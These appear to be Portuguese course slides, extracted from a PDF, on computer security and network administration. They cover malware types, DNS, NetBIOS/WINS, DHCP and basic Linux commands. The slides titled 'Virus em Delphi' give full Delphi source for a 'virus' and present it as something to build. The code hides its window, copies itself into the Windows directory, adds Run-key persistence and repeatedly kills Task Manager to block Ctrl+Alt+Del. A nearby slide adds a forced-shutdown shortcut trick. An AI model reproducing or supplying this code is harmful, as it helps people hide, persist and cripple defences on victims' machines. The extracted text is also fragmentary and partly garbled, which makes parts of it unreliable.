Trojans ou cavalos de Tria Certos vrus trazem em seu bojo um cdigo a parte, que permite a um estranho acessar o micro infectado ou coletar dados e envi-los pela Internet para um desconhecido, sem notificar o usurio. Estes cdigos so denominados de Trojans ou cavalos de Tria. Inicialmente, os cavalos de Tria permitiam que o micro infectado pudesse receber comandos externos, sem o conhecimento do usurio. Desta forma o invasor poderia ler, copiar, apagar e alterar dados do sistema. Atualmente os cavalos de Tria agora procuram roubar dados confidenciais do usurio, como senhas bancrias. Os vrus eram no passado, os maiores responsveis pela instalao dos cavalos de Tria, como parte de sua ao, pois eles no tm a capacidade de se replicar. Atualmente, os cavalos de Tria no mais chegam exclusivamente transportados por vrus, agora so instalados quando o usurio baixa um arquivo da Internet e o executa. Prtica eficaz devido a enorme quantidade de e-mails fraudulentos que chegam nas caixas postais dos usurios. Tais e-mails contm um endereo na Web para a vtima baixar o cavalo de Tria, ao invs do arquivo que a mensagem diz ser. Esta prtica se denomina phishing,expresso derivada do verbo to fish, "pescar" em ingls. Atualmente, a maioria dos cavalos de Tria visam sites bancrios, "pescando" a senha digitada pelos usurios dos micros infectados. H tambm cavalos de Tria que ao serem baixados da internet "guardados" em falsos programas ou em anexos de email, encriptografam os dados e os comprimem no formato ZIP. Um arquivo .txt d as "regras do jogo": os dados foram "seqestrados" e s sero "libertados" mediante pagamento em dinheiro para uma determinada conta bancria, quando ser fornecido o cdigo restaurador. Tambm os cavalos de tria podem ser usados para levar o usurio para sites falsos, onde sem seu conhecimento, sero baixados trojans para fins criminosos, como aconteceu com os links do google, pois uma falha de segurana poderia levar um usurio para uma pgina falsa. Por este motivo o servio esteve fora do ar por algumas horas para corrigir esse bug, pois caso contrrio as pessoas que no distinguissem o site original do falsificado seriam afetadas. Hijackers Hijackers so programas ou scripts que "sequestram" navegadores de Internet, principalmente o Internet Explorer. Quando isso ocorre, o hijacker altera a pgina inicial do browser e impede o usurio de mud-la, exibe propagandas em pop-ups ou janelas novas, instala barras de ferramentas no navegador e podem impedir acesso a determinados sites (como sites de software antivrus, por exemplo).
Vrus no Orkut Em torno de 2006 e 2007 houve muitas ocorrncias de vrus no Orkut que capaz de enviar scraps (recados) automaticamente para todos os contatos da vtima na rede social, alm de roubar senhas e contas bancrias de um micro infectado atravs da captura de teclas e cliques. Apesar de que aqueles que receberem o recado precisam clicar em um link para se infectar, a relao de confiana existente entre os amigos aumenta muito a possibilidade de o usurio clicar sem desconfiar de que o link leva para um worm. Ao clicar no link, um arquivo bem pequeno baixado para o computador do usurio. Ele se encarrega de baixar e instalar o restante das partes da praga, que enviar a mensagem para todos os contatos do Orkut. Alm de simplesmente se espalhar usando a rede do Orkut, o vrus tambm rouba senhas de banco, em outras palavras, um clssico Banker. Keylogger O KeyLogger uma das espcies de vrus existentes, o significado dos termos em ingls que mais se encaixa no contexto seria: Capturador de teclas. Ao serem executados, normalmente os keyloggers ficam escondidos no sistema operacional, sendo assim a vtima no tem como saber que est sendo monitorada. Atualmente os keyloggers so desenvolvidos para meios ilcitos, como por exemplo roubo de senhas bancrias. So utilizados tambm por usurios com um pouco mais de conhecimento para poder obter senhas pessoais, como email, orkut, MSN, entre outros. Existem tipos de keyloggers que capturam a tela da vtima, sendo assim, quem implantou o keylogger tem controle sobre o que a pessoa est fazendo no computador. Estado Zumbi O estado zumbi em um computador ocorre quando infectado e est sendo controlado por terceiros. Podem us-lo para disseminar, vrus , keyloggers, e procededimentos invasivos em geral. Usualmente esta situao ocorre pelo fato da mquina estar com seu Firewall e ou Sistema Operacional desatualizados. Segundo estudos na rea, um computador que est na internet nessas condies tem quase 50% de chance de se tornar uma mquina zumbi, que dependendo de quem est controlando, quase sempre com fins criminosos, como acontece vez ou outra, quando crackers so presos por formar exrcitos zumbis para roubar dinheiro das contas correntes e extorquir.
Vrus de E-mail At pouco tempo atrs no existiam vrus de E-mail e todos os textos que circulavam sobre isso eram Hoax (trotes). Recentemente surgiram novos tipos de worm, que se propagam por mails e no necessitam que se execute qualquer programa anexado ou no a mensagens como por exemplo: KakWorm, Romeu e Julieta e Davinia. KakWorm : S ataca as verses inglesa e francesa do Outlook. Para que a contaminao acontea basta que uma mensagem contaminada seja exibida no painel de visualizao, sem necessidade de abrir o mail. Alm de sua autopropagao, o principal efeito consiste no desligamento do computador. Ele se aloja no final de cada mensagem enviada como se fosse uma assinatura e todas as mensagens levaro consigo o KakWorm. Todo primeiro dia do ms, s17hs, apresentada a mensagem: Kagou-Anti-Kro$oft says not today!. Em seguida, o computador desligado. Romeu e Julieta : Ataca os computadores que usam as verses 4.0, 4.01, 5.0, e 5.01 do navegador Internet Explorer em computadores que usam o Windows 95, 98, Me ou 2000. Ele se autopropaga por meio do envio de mensagens e causa instabilidades no computador contaminado. Uma caracterstica desse worm que o assunto (subject) da mensagem que contm o vrus varia e selecionado aleatoriamente entre os seguintes: Romeo&Juliet - where is my juliet - where is my romeo ? - hi - last wish ??? - lol :) - ,,, - !!! - newborn - merry christmas! - surprise ! - Caution: NEW VIRUS ! - scandal ! - ^_^ - Re: - Romeo&Juliet - <> :)))))) - hello world !!??!?!? - subject - ble bla, bee - I Love You ;) - sorry - Hey you ! Matrix has you - my picture from shake-beer Davinia: capaz de contaminar e de autopropagar-se sem a existncia de um arquivo anexado mensagem, danifica todos os arquivos .html e os deixa irrecuperveis.
Vrus de macro Quando se usa alguns programas, por exemplo um editor de texto, e necessita-se executar uma tarefa repetidas vezes em seqncia (por exemplo substituir todos os eh por ) pode-se editar um comando nico para efetu-las. Esse comando chamado de macro, que pode ser salvo em um modelo para ser aplicado em outros arquivos. Alm dessa opo da prpria pessoa fazer um modelo os comandos bsicos dos editores de texto tambm funcionam com modelos. Os vrus de macro atacam justamente esses arquivos comprometendo o funcionamento do programa. Os alvos principais so os prprios editores de texto (Word) e as planilhas de clculo (Excel). A disseminao desse tipo de vrus muito mais acentuada pois documentos so muito mveis e passam de mquina em mquina . Ao escrever, editar ou, simplesmente, ler arquivos vindos de computadores infectados a contaminao ocorre. Assim, verdadeiras epidemias podem acontecer em pouco tempo. Alm disso, os macrovrus constituem a primeira categoria de vrus multiplataforma, ou seja, no se limitam aos computadores pessoais, podendo infectar tambm outras plataformas que usem o mesmo programa, como o Macintosh, por exemplo.
Phishing scam
j Bastante comum, esse tipo de golpe virtual
baseado no envio de e-mails sugerindo que os internautas baixem arquivos ou visitem sites maliciosos. Outra possibilidade para enganar os usurios da web a oferta de links, tambm para pginas fraudulentas, em variados sites, blogs e redes sociais. Quando aceitam a sugesto dos piratas, abrindo os arquivos ou visitando esses endereos, as vtimas em potencial podem infectar seus computadores involuntariamente com programas maliciosos. Geralmente, essas pragas instaladas na mquina tm como objetivo roubar informaes pessoais dos usurios de internet.
182
Phishing scam
183
184
de srie inglesa de comdia onde os clientes pediam repetidamente SPAM, marca de um presunto enlatado americano.
no solicitadas. Vrios programas fazem esse servio, como por exemplo, o SPAM Assassin. So configurados para bloquear as mensagens vindas de endereos conhecidos que disseminam essas mensagens. Bloqueia-se tambm as mensagens contendo alguma palavra ou expresso especfica, por exemplo:
axfr 32%
dos 1% fraude 0%
anexo
Possveis danos
j j j j
Perda de desempenho do micro; Excluso de arquivos; Alterao de dados; Acesso a informaes confidenciais por pessoas no autorizadas; j Perda de desempenho da rede (local e Internet); j Monitoramento de utilizao (espies); j Desconfigurao do Sistema Operacional. j Inutilizaro de determinadas peas.
190
E os anti-vrus so
191
Anti virus em ao
Anti Spywere em ao
194
Cdigo de Vrus
j Teste
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICARSTANDARD-ANTIVIRUS-TEST-FILE!$H+H*
j Malicioso (Salvar no Bloco de Nota
195
196
Criem um atalho e na localizao escrevam " shutdown -s -t 60 -c " qualquer coisa que queiram dizer, mas tem de ser entre aspas" T (TEMPO EM SEGUNDOS) Podem mudar C (Comentrio)
197
Virus em Delphi
j Existe muitas maneiras de criar um virus em
delphi, a maioria dos trojans famosos que circulo n internet foram feitos em delphi. Eu vou mostrar como fazer um virus reninciar junto com o windows e travar o Ctrl + Alt + Del. j Vamos la, Primeiro abra um projeto e coloque na uses "Registry," j Agora em baixo de "{$R *.dfm}" coloque isso:
198
procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean ); var sKey : string; reg : TRegIniFile; begin if( bRunOnce )then begin sKey := 'Once' end else begin sKey := ''; end; reg := TRegIniFile.Create( '' ); reg.RootKey := HKEY_LOCAL_MACHINE; reg.WriteString('Software\Microsoft' + '\Windows\CurrentVersion\Run'+ sKey + #0, sProgTitle, sCmdLine ); reg.Free; end; Agora no FormCreate coloque isso: procedure TForm1.FormCreate(Sender: TObject); begin Application.ShowMainForm := False; CopyFile(PChar(Application.ExeName),'C:\WINDOWS\virus.exe',True); RunOnStartup('virus','C:\WINDOWS\virus.exe',true); end;
199
Agora vamos fazer a parte de travar a listagem de processos, vou dar o coder todo basta voce fazer sua arte: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, TLHelp32, PsAPI, ExtCtrls; type TForm1 = class(TForm) Timer1: TTimer; procedure Timer1Timer(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} function TerminarProcesso(sFile: String): Boolean; var verSystem: TOSVersionInfo; hdlSnap,hdlProcess: THandle; bPath,bLoop: Bool; peEntry: TProcessEntry32; arrPid: Array [0..1023] of DWORD; iC: DWord; k,iCount: Integer; arrModul: Array [0..299] of Char; hdlModul: HMODULE; begin Result := False; if ExtractFileName(sFile)=sFile then bPath:=false else bPath:=true; verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo); GetVersionEx(verSystem); if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then begin hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); peEntry.dwSize:=Sizeof(peEntry); bLoop:=Process32First(hdlSnap,peEntry); while integer(bLoop)<>0 do begin if bPath then begin if CompareText(peEntry.szExeFile,sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry .th32ProcessID), 0); Result := True; end; end else begin if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry .th32ProcessID), 0); Result := True; end; end;
bLoop := Process32Next(hdlSnap,peEntry); end; CloseHandle(hdlSnap); end else if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then begin EnumProcesses(@arrPid,SizeOf(arrPid),iC); iCount := iC div SizeOf(DWORD); for k := 0 to Pred(iCount) do begin hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,false,arrPid [k]); if (hdlProcess<>0) then begin EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),iC); GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arrModul) ); if bPath then begin if CompareText(arrModul,sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); Result := True; end; end else begin if CompareText(ExtractFileName(arrModul),sFile) = 0 then begin TerminateProcess(OpenProcess(PROCESS_TERMINATE or PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0); Result := True; end; end; CloseHandle(hdlProcess); end; end; end; end; procedure TForm1.Timer1Timer(Sender: TObject); begin TerminarProcesso('taskmgr.exe'); end; procedure TForm1.FormCreate(Sender: TObject); begin application.ShowMainForm := false; end; end.
200
A Dor do Blaster
j Duas linhas de cdigo C no RPCSS:
while (*pwszTemp != L'\\') *pwszServerName++ = *pwszTemp++;
j Levaram a
>15 milhes de computadores infectados 3.3M de chamados de suporte em Set. 2003 (volume normal relacionado a vrus de 350,000) Muita repercusso negativa
Isto aumentar o nvel de frustrao ao ponto que vrias organizaes iro contemplar seriamente alternativas Microsoft Gartner Group realmente recomendado ter cautela aqui. Os esforos [de segurana da Microsoft] foram sinceros, mas no estou certo se foram sinceros o suficiente. Forrester Research
Segurana como uma opo Segurana como um aditivo Integrao extremamente complicada No economicamente vivel No pode focar na principal prioridade
Segurana como parte do sistema Segurana Embutida na Rede Colaborao inteligente entre os elementos Viso de sistemas Foco direto na principal prioridade
Prtica de Segurana x
204
205
Instalao
206
Instalao
207
Instalao
208
Instalao
209
Instalao 2003
210
Introduo a Servios
211
DNS
212
Nomes Hierrquicos
Agrupa nomes em domnios. A rvore de nomes armazenada num banco de dados distribudo distribudo.
j Especificaes do DNS RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536.
Expecificaes da Internet Task Force
Servio DNS
Servio DNS Servidor DNS
Nome? IP
Nome?
IPB
Nome de Domnio
j Os nomes Hierrquicos utilizados pelo DNS
so chamados FQDN: Fully Qualified Domain Name j Exemplo: www.pucpr.br www: nome do host pucpr: nome de domnio br: nome de domnio j Nome de domnio: Coleo de HOSTS ou de outros domnios.
rvore de nomes
RAIZ br br pucpr
ufpr
Pucpr
www
Ufpr
ppgia www
www FOLHA
ppgia
www
RAIZ
www
www
www
servidor dns.pucpr.br
www
www
www
SOA indica qual o servidor armazena o arquivo de zona NS indica qual o servidor que responde pelo domnio. Nomes terminados por . so absolutos
@ SOA dns.pucpr.br @ NS dns.pucpr.br dns.pucpr.br. A 200.17.99.2 www A 200.17.99.2 www.ppgia A 200.17.98.174 ZONA pucpr.br
j j j j
ZONA ufpr.br
associa um nome a um endereo IP: nome IP. j PTR: Point Resource Record associa um endereo IP a um nome: IP nome. j NS: Name Server identifica o servidor DNS no domnio. j SOA: Start of Authority indica que o servidor de DNS a autoridade para fornecer informaes no domnio (authoritative authoritative).
Consulta Reversa
correspondente. j Os registros que relacionam IPs aos nomes so do tipo PTR.
Por exemplo, um registro para o endereo IP 10.17.98.31 corresponde a uma entrada DNS no seguinte formato:
31.98.17.10.in-addr.arpa
local (aquele controlado pelo servidor DNS consultado), o servidor DNS contata o servidor DNS situado num n superior da rvore.
Este mecanismo de procura seqencial consultando os ns superiores chamado walking the tree.
Forwarder
configurao que diz: Lista de zonas que ele armazena Lista de servidores forwarders j Lista de zonas Indica a localizao fsica do arquivo correpondente a cada ZONA. j Lista de forwarders Um forwarder um servidor DNS hierarquicamente superior ao servidor corrente. Esse servidor recebe as consultas de domnios no armazenados pelo servidor DNS.
j Cada servidor DNS possui um arquivo de
Exemplo
Arquivo de configurao do servidor dns.pucpr.br forwarders { primeiro forwarder segundo forwarder etc. } zona { localizao } zona { localizao }
Ponteiros NS e Forwarders
FORWARDER
FORWARDER
ZONA ufpr.br
ufpr
ppgia
www
www
www
Consulta Recursiva
j Graas ao ponteiros NS e FORWARDER qualquer servidor DNS pode
O mapeamento nome-IP requisitado Uma mensagem de erro dizendo que o domnio ou host no foi encontrado.
RESPOSTA AUTORITRIA
a.pucpr.br?
IP = 10.17.98.31
1 2 2 5
.br
3 4
d.ufpr.br
IP = 200.17.98.174
pucpr
a b c
ufpr
d
6
RESPOSTA NO AUTORITRIA SE VIER DA CACHE
DNS e a Internet
j O root da rvore de nomes da Internet
gerenciado pelo Internet Network Information Center (InterNIC InterNIC) j InterNIC o nome dado a um projeto criado num acordo entre a National Science Foundation (NSF) e a Network Solutions, Inc. Prov um servio de registro de nomes para os domnios .com, .net, .org, and .edu; O site do InterNIC http://www.internic.net j O InterNIC delega a responsabilidade de administrar partes do domnio de nomes para as empresas e organizaes conectadas na Internet.
Geographical Domains:
2 caracteres para identificar o pas. .br, .fr, .jp, etc.
Reverse domain:
domnio especial utilizado para associar endereos IP aos nomes.
Exemplo
Gerido pelo InterNIC
www
rla01 ppgia
Zonas
Servidor DNS do Internic
REGISTRO NS
www
rla01 ppgia
Tipos de Servidores
j Primrio
o servidor autoritrio para zona. A incluso, alteraes ou excluso dos registros da zona so feitas atravs deste servidor. O servidor primrio envia uma cpia dos seus arquivos de dados para o servidor secundrio atravs de um processo denominado zone transfer transfer
j Secundrio
Funciona como backup. Apenas l os arquivos de dados do servidor primrio, e responde as requisies dos clientes quando requisitado.
j Caching-Only Caching So servidores DNS que apenas efetuam consultas e guardam o resultado numa cache e retornam os resultados. Um servidor DNS realiza consulta a outros servidores sempre que tiver que localizar um nome externo as zonas que controla.
DNS - Resumo
j Vantagens:
Implementa um mecanismo de nomes hierrquico.
Isto facilita a organizao dos nomes em redes de grande porte.
j Desvantagem:
No dinmico.
responsabilidade do administrador manter as entradas do arquivo de nomes atualizada.
Netbios
233
Nomes NetBIOS
j O espao de nomes NetBIOS flat
flat = no segmentado implica que cada nome NetBIOS na rede deve ser nico
Nome Tipo Status -----------------------------------------------------------------------PPGIA16 <00> UNIQUE Registrado PPGIA16 <20> UNIQUE Registrado MESTRADO <00> GROUP Registrado PPGIA16 <03> UNIQUE Registrado MESTRADO <1E> GROUP Registrado JAMHOUR <03> UNIQUE Registrado
Nomes NetBIOS
j Podem ser de dois tipos:
UNIQUE (one owner)
Referenciam um nico recurso na rede Exemplo: uma estao
nicos so:
<00> Nome do Computador e do Domno (ou grupo) <03> Usurio logado <20> Servio de nomes de servidor para sincronizao de arquivos compartilhados
NetBIOS name cache NetBIOS name server - WINS server IP subnet broadcast Static LMHOSTS files Static HOSTS files DNS servers
mtodo dinnico para resoluo de endereos. Datagrama NetBIOS Name Query em broadcast perguntando o nome correspondente ao endereo. Endereo MAC: FF-FF-FF-FF-FF-FF Endereo IP: 255.255.255.255 j Problemas: Aumento do trfego na rede No funciona em redes segmentadas por rotedores Os recursos localizados em outras redes no recebem os pedidos de broadcast pois, por default, o roteador bloqueia os pacotes recebidos em broadcast.
ACME
IAPO1
IAPO2
LAB0101
PPGIA
REDE A
REDE B
BROADCAST BROADCAST
j C:\>nbtstat -c j Endereo-Ip n: [200.17.98.217] Identificador de escopo: [] j Tabela de nomes de caches remotas de NetBIOS j j j j j
Nome Tipo Endereo Host [seg] --------------------------------------------------------------PPGIA07 <00> UNIQUE 200.17.98.224 PPGIA07 <20> UNIQUE 200.17.98.224 HAL2001 <00> UNIQUE 10.17.98.31
Durao
20 600 660
A diretiva #PRE pode ser utilizada para registrar entradas diretamente na cache. Neste caso, as entradas so consultadas antes de qualquer outro mecanismo de resoluo:
j Exemplos:
10.17.98.31 hal2001 #pre 10.17.08.30 PPGIA16 #coloca a entrada na cache #no coloca na cache
domnios:
#DOM:ELETRICA.RIEP
Mantm uma tabela que mapeia os endereos IP com o nome dos computadores. A tabela atualizada dinamicamente toda a vez que uma mquina recebe um novo endereo IP.
j Exemplo: WINS: Windows Internet Name Service j O servio WINS trabalha numa arquitetura cliente-
servidor.
WINS Server:
manipula todos as consultas de nomes.
WINS Client:
registra seu nome e endereo no servidor WINS. envia as requisies de nomes para o WINS server.
WINS SERVER
ACME
IAPO1
IAPO2
LAB0101
PPGIA
TABELA DINMICA
REDE A
REQUEST
REDE B
REPLY
Caractersticas do WINS
replicao
roteador
WINS server
WINS pro y
j WINS Server
Definies
Computador que executa o servio Windows Internet Name
Este computador mantem uma base de dados relacionando os nomes e os endereos IP das estaes na rede.
j WINS proxy
Estaes que acessam o servio WINS para os clientes Non-WINS enable.
pois: permite distribuir a carga de resoluo de nomes as consultas de nomes feita pelos clientes so ponto-aponto. O mecanismo de broadcast s utilizado quando o nome solicitado no encontrado na base do servidor WINS. diminui a possibilidade de interrupo do servio de nomes cada servidor WINS possui uma cpia completa da base de nomes, funcionando como backup dos demais. quando um servidor entra em pane, os clientes passam a consultar automaticamente o outro servidor.
WINS SERVER
WINS SERVER
j Para redes grandes, o WINS invivel pois: O nmero de replicaes muito grande Cada servidor WINS guarda uma cpia completa de todos os nomes.
renovados periodicamente para que o computador mantenha o nome. O cliente foi desligado Ou o nome foi liberado e plicitamente
Resoluo de Nomes
j Os mecanismos de resoluo de nomes do NetBIOS
b-node: (broadcast-node) resolvem nomes por broadcast de IP p-node: (point-to-point-node) usam um servidor de nomes NetBIOS m-node: (mix -node) se b-node falhar tentam p-node. h-node: (hybrid-node) se p-node falhar tentam b-node
WINS - Resumo
j Vantagens:
Reduz significativamente o nmero de broadcasts de endereos IP necessrios para localizar recursos locais e remotos. Permite que clientes resolvam nomes de estaes situados em segmentos remotos isolados por roteadores. Reduz a necessidade de manter e atualizar os arquivos LMHOSTS.
j Desvantagens:
No implementa um mecanismo de nomes hierrquico. Isto dificulta a administrao de redes de grande porte. O banco de dados que armazena os nomes NetBIOS no distribudo. Cada servidor WINS constitui uma rplica completa do banco de dados de nomes. No compatvel com o servio de nomes usado na Internet.
DHCP
251
DHCP
j Dynamic Host Configuration Protocol Padro Industrial Aberto
IETF RFC 1533, 1534, 1541 e 1542. IETF: Internet Engineering Task Force RFC: Request for Comments
Utilizado para centralizar a administrao e configurao de parmetros TCP/IP numa rede. Elimina a necessidade de configurar manualmente os clientes numa rede TCP/IP.
DHCP - Arquitetura ClienteServidor deve funcionar como servidor DHCP. Um computador da rede
REQUEST
SERVIDOR DHCP
CLIENTES DHCP
REPLY
Administrao de Endereos IP
j Cada computador numa rede TCP/IP deve ter um
endereo IP nico.
O endereo IP identifica a estao e a rede ao qual a estao pertence. Quando o computador movido para outra rede, seu endereo IP deve refletir esta mudana.
ESCOPO DHCP
j Quando se utiliza DHCP, cada rede local caracterizada
por um ESCOPO:
PARTE FIXA
Processo de Atribuio
ESCOPO
Cliente DHCP
...
Dhcprelease 200.17.98.1
Servidor DHCP
Processo de Atribuio
j 1) O cliente envia a mensagem Dhcpdiscover em broadcast. j
O endereo IP de origem do pacote 0.0.0.0 pois o cliente ainda no tem um endereo IP. 2) Quando o servidor recebe o pacote, ele seleciona um endereo IP disponvel na sua lista e oferece ao cliente. O servidor responde ao cliente com a mensagem Dhcpoffer 3) Quando o cliente recebe a oferta ele pode: aceitar enviando a mensagem Dhcprequest (incluindo o IP) em broadcast recusar enviando a mensagem Dhcpdecline em broadcast 4) Quando o servidor recebe o Dhcprequest ele pode: confirmar para o cliente com a mensagem Dhcpack recusar, se o endereo foi usado por outro, com a mensagem Dhcpnack 5) O cliente pode liberar um endereo com a mensagem Dhcprelease.
Observaes
j 1) O cliente aceita a primeira oferta que receber.
Se houver mais de um servidor DHCP distribuindo endereos IP, no haver como selecionar apenas um deles. j 2) O direito do cliente de usar o endereo IP recebido pelo servidor DHCP temporrio. Quando o prazo de validade do IP expira, o servidor pode atribu-lo a outra estao na rede. O cliente pode liber-lo antecipadamente com a mensagem Dhcprelease
Observaes
j 3) Se o cliente no receber a oferta do
servidor: Ele repete o pedido em intervalos de 2, 4, 8, 16 segundos. Se as 4 tentativas fracassarem, ele tenta novamente em intervalos de 5 minutos. j 4) Quando o cliente reinicializado, ele tenta utilizar o mesmo IP que tinha anteriormente. Ele envia o pacote Dhcprequest com o endereo IP antigo ao invs do Dhcpdiscover. Se o pedido negado, ento o cliente envia um Dhcpdiscover.
ESCOPO
Cliente DHCP
OU
Dhcpnack Dhcpdiscover
Servidor DHCP
(notebooks, por exemplo) devem receber IPs com tempo de leasing curto.
Servidor DHCP 2
Prtica: DHCP
j Instalar e configurar o DHCP; j Criar Escopo j reas de excluses j Definir arquivos por MAC ADDRESS
263
264
265
266
267
Prtica: IIS
268
Prtica: IIS
269
270
271
272
273
274
LiNUX: Ubuntu
275
Instalao
276
Instalao (cont)
277
digitais, pendrives j /sbin : Diretrio de programas usados pelo superusurio (root) para administrao e controle do funcionamento do sistema. j /tmp : Arquivos temporrios criados por programas. j /usr : Diretrio dos aplicativos. A maioria estar instalada neste diretrio. Curiosidade: usr no quer dizer User e sim Unix System Resources. j /var : Diretrio contm arquivos que so gravados com freqncia pelos aplicativos do sistema, como: e-mails, cache, spool de impressora. Essa estrutura que mostrei acima, considerada padro. Encontrar a mesma se estiver utilizando a distribuio da Red Hat, SuSe ou 279 o Ubuntu.
Estrutura de dispositivos
Linux j ttyS0 j ttyS1 j ttyS2 j ttyS3 j lp0 j lp1 j /dev/hda1 j /dev/hda2 j /dev/hdb1 DOS COM1 COM2 COM3 COM4 LPT1 LPT2 C: D: D: IRQ 4 3 4 3 7 5 14 * 14 15 DMA I/O 0x3F8 0x2F8 0x3E8 0x2E8 3(ECP) 0x378 3(ECP) 0x278 0x1F0,0x3F6 0x1F0,0x3F6 0x170,0x376
280
Linux
clear ls -la
Diferenas
Sem diferenas. A listagem no Linux possui mais campos (as permisses de acesso) e o total de espao ocupado no diretrio e livre no disco deve ser vistos separadamente usando o comando du e df. Permite tambm listar o contedo de diversos diretrios com um s comando (ls /bin /sbin /...). Poucas diferenas. cd sem parmetros retorna ao diretrio de usurio e tambm permite o uso de "cd -" para retornar ao diretrio anteriormente acessado. Poucas diferenas. O rm do Linux permite especificar diversos arquivos que sero apagados (rm arquivo1 arquivo2 arquivo3). Para ser mostrados os arquivos apagados, deve-se especificar o parmetro "-v" ao comando, e "-i" para pedir a confirmao ao apagar arquivos. Uma s diferena: No Linux permite que vrios diretrios sejam criados de uma s vez (mkdir /tmp/a /tmp/b...). Os particionadores do Linux trabalham com praticamente todos os tipos de parties de diversos sistemas de arquivos diferentes. Sem diferenas.
281
cd
cd
del
rm
md fdisk help
Linux
echo cp
Diferenas
Sem diferenas. Poucas diferenas. Para ser mostrados os arquivos enquanto esto sendo copiados, deve-se usar a opo "-v", e para que ele pergunte se deseja substituir um arquivo j existente, deve-se usar a opo "-i". No Linux deve ser usado ":" para separar os diretrios e usar o comando "export PATH=caminho1:/caminho2:/caminho3:" para definir a varivel de ambiente PATH. O path atual pode ser visualizado atravs do comando "echo $PATH". Poucas diferenas. No Linux no possvel renomear vrios arquivos de uma s vez (como "ren *.txt *.bak"). necessrio usar um shell script para fazer isto. Sem diferenas. Poucas diferenas (o uname tem algumas opes a mais). Poucas diferenas, precisa apenas que seja especificado o dispositivo a ser formatado como "/dev/fd0" ou "/dev/hda10" (o tipo de identificao usada no Linux), ao invs de "A:" ou "C:". Mostra detalhes sobre a quantidade de dados em buffers, cache e memria virtual (disco).
282
path
path
ren
mv
mem
Linux
date date chmod
Diferenas
No Linux mostra/modifica a Data e Hora do sistema. No Linux mostra/modifica a Data e Hora do sistema. O chmod possui mais opes por tratar as permisses de acesso de leitura, gravao e execuo para donos, grupos e outros usurios. O fsck mais rpido e a checagem mais abrangente. O fsck mais rpido e a checagem mais abrangente. A memorizao de comandos feita automaticamente pelo bash. O edit mais fcil de usar, mas usurio experientes apreciaro os recursos do vi ou o emacs (programado em lisp) O plip do Linux permite que sejam montadas redes reais a partir de uma conexo via Cabo Paralelo ou Serial. A mquina pode fazer tudo o que poderia fazer conectada em uma rede (na realidade uma rede e usa o TCP/IP como protocolo) inclusive navegar na Internet, enviar e-mails, irc, etc. Mesmo que o acima.
283
interlnk
intersvr
plip
move
mv
scan backup
----tar
lpr
vol xcopy
e2label cp -R
284
Comandos Bsicos
j Verificar o Local onde est trabalhando => pwd j Criar diretrio => mkdir <diretorio>
mkdir <aula>
j Chamar diretrio => cd
cd aula
j Verificar o que existe no diretrio => ls la j Criar arquivos vazios => touch
touch arquivo1
j Editar o arquivo => vi, mc,
vi <arquivo> ou vi /<caminho>/arquivo
285
Comandos Bsicos
j Alguns comandos do vi
inserir -> a,insert yy -> copiar (copiar n linhas usar n cc) dd -> apagar (apaga n linhas usar n dd) p -> colar / -> procurar v -> desfaz a ltima alterao :x ou :wq -> salva e sai :q! -> sair sem salvar
j Criar o texto abaixo (crie 2 arquivos fazios chamado http e telnet edite
o texto abaixo): ### Permite acesso web (HTTP). $IPTABLES -A FORWARD -p tcp --dport 80 -j ACCEPT
### Permite acesso web (TELNET). $IPTABLES -A FORWARD -p tcp dport 23 -j ACCEPT
286
Comandos Bsicos
j Move arquivo => mv
mv /<caminho_antigo>/<arquivo> /<novo_caminho>/<arquivo>
j Renomear arquivo=> mv
diff <arquivo1> <arquivo2> Para melhor fixao faa o seguinte exerccio: - Na sua pasta home, crie um diretrio chamado aula e dentre dele mais dois diretrios chamados http e ftp. - Move os arquivos criados anteriormente (http e ftp) para as suas respectivas pastas - Renomeie os arquivos para new_http e new_ftp - Verifique a diferena entre os arquivos
287
Comandos Bsicos
j verificar uma placa de rede => ifconfig j Verificar os usurios que esto logados ou em telnet => w j Compactar arquivos
Tar.gz => tar -cvfz <nm do arquivo>.tar.gz <diretrio a ser compactado> Ex: tar -cvfz etc.tar.gz etc bz2 (melhor compactao) tar cvjf <nmdoarquivo>.tar.bz2 /<caminhod do arquivo> EX: tar cvjf ergon.tar.bz2 /mnt/temp
j Para descompactar estes formatos de arquivos, os comandos so
simples: zip: => gunzip nomedoarquivo rar: => rar x nomedoarquivo tar: => gzip nomedoarquivo tar.gz: => tar -vzxf nomedoarquivo tar.bz2: => tar -vxjpf nomedoarquivo
288
Comandos Bsicos
j juntar dois arquivos => cat <arquivo final> <arquivo1> <arquivo2> j Dar permisso arquivos => chmod
d rwx r-x wx d => diretrio 1 trinca => usurio proprietrio 2 trinca => grupo do usurio proprietrio 3 trinca => outros usurio r -> read (4) w-> write (2) x ->execute (1) rwx -> 4+2+1=7 r-x -> 4+0+1=5 rw- -> 4+2+0=6 r-- -> 4+0+0=4
289
Comandos bsicos
j Exerccio de fixao
Dentro do diretrio aula crie um arquivo apartir da juno dos arquivos http_new e ftp_new, cujo nome ser firewall, sendo que este arquivo dever ter as seguintes permises: Usurio proprietrio = completo Grupo usurio proprietrio = leitura e escrita Outros = leitura e execuo Depois faa a compactao da pasta aula
290
Comandos Bsicos
j Verificar processos rodando na maquina => top ou ps aux ou os -aux
|grep <processo>
j Matar processos => kill -9 <pid processo> j Montar unidades (cdrom, pen driver, hd sata, ...) => mount
Unmount /dev/das Exerccio: Mountar e desmontar a unidade do cdrom. Abrir uma nova sesso (console) e matar o seu processo.
291
